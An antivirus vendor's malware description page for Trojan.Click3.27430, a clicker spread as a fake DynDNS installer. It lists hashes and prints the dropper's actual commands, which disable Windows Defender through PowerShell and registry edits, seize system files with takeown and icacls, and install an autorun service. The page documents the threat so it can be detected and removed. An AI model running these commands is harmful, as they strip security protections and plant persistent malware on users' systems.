Protégez votre univers

Nos autres ressources

  • free.drweb.fr — utilitaires gratuits, plugins, widgets
  • av-desk.com — service Internet pour les prestataires de services Dr.Web AV-Desk
  • curenet.drweb.com — l'utilitaire de désinfection réseau Dr.Web CureNet!
Fermer

Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Trojan.Click3.27430

Added to the Dr.Web virus database:2018-11-15
Virus description added:

SHA1:

  • f98b98d7cfb9959c42f79dcdfa5ef9012a6c8a65
  • 6e774cb765455281979bbe359972d191afbe82d4
  • 64058cd91af671e757756f790c98bcd10e1982b8
  • 1f71605b72c9382bedff3aea8c4883ca1baaa8f7

A Trojan clicker, distributed under the guise of the DynDNS app from the website dnsip.ru in the archive Dyn-DNS-Setup-2018_11_16_07.zip. The archive contains the setup.exe application, which downloads the Setup100.arj file—an MZPE with modified MZ and PE signatures and a modified offset to the PE header:

screenshot Trojan.Click3.27430 #drweb

When launched, the dropper uses PowerShell to disable Windows Defender:


powershell  New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
powershell  Set-MpPreference -DisableRealtimeMonitoring $true
cmd.exe /c net stop WinDefend
net  stop WinDefend

Then it modifies the registry:


SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender\UX Configuration] 'Notification_Suppress' = '00000001'
SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender] 'DisableAntiSpyware' = '00000001'
SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender\Real-Time Protection] 'DisableRealtimeMonitoring' = '00000001'
SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender\Real-Time Protection] 'DisableBehaviorMonitoring' = '00000001'
SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender\Real-Time Protection] 'DisableOAVProtection' = '00000001'
SetValueKey       [<HKLM>\Software\Policies\Microsoft\Windows Defender\Real-Time Protection] 'DisableOnAccessProtection' = '00000001'

Next, it prepares to install and update its services:


cmd.exe /c net stop YandexService & takeown /f "<SYSTEM32>\yandexservice.exe" & icacls "<SYSTEM32>\yandexservice.exe" /grant user:F /c
cmd.exe /c net stop DNS-Service & takeown /f "<SYSTEM32>\dnsservice.exe" & icacls "<SYSTEM32>\dnsservice.exe" /grant user:F /c

After that, the dropper saves the files instsrv.exe, srvany.exe, dnshost.exe, and yandexservice.exe (which contains the Trojan) to the %System32% folder and installs the service:


cmd.exe /c takeown /f "<SYSTEM32>\yandexservice.exe" & icacls "<SYSTEM32>\yandexservice.exe" /grant user:F /c
cmd.exe /c takeown /f "<SYSTEM32>\srvany.exe" & icacls "<SYSTEM32>\srvany.exe" /grant user:F /c 
cmd.exe /c takeown /f "<SYSTEM32>\instsrv.exe" & icacls "<SYSTEM32>\instsrv.exe" /grant user:F /c
cmd.exe /c takeown /f "<SYSTEM32>\dnsservice.exe" & icacls "<SYSTEM32>\dnsservice.exe" /grant user:F /c
cmd.exe /c  <SYSTEM32>\instsrv.exe YandexService remove
cmd.exe /c  <SYSTEM32>\instsrv.exe YandexService <SYSTEM32>\srvany.exe

Then the Trojan manually modifies the settings of the service so that yandexservice.exe autoruns at the same time Windows launches, and then starts up the service:


cmd.exe /c sc config "YandexService" start= auto
cmd.exe /c net start YandexService

Then the dropper installs the DynDNS application. The application archive contains the following files:

ASYCFILT.DLL
COMCAT.DLL
dnsip.exe
msvbvm60.dll
OLEAUT32.DLL
OLEPRO32.DLL
SETUP1.EXE
ST6UNST.EXE
STDOLE2.TLB
VB6STKIT.DLL

When the program is uninstalled by regular Windows tools, it only uninstalls the application; meanwhile, the Trojan remains in the system.

The complete list of indicators of compromise can be found here.

News about the Trojan

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.
Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web sur le site

Par le numéro de série

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android

Editeur russe des solutions antivirus Dr.Web

Expérience dans le développement depuis 1992

Les internautes dans plus de 200 pays utilisent Dr.Web

L'antivirus est fourni en tant que service depuis 2007

Support 24/24

© Doctor Web
2003 — 2019

Doctor Web - éditeur russe des solutions antivirus Dr.Web. Doctor Web développe les produits Dr.Web depuis 1992.

333b, Avenue de Colmar, 67100 Strasbourg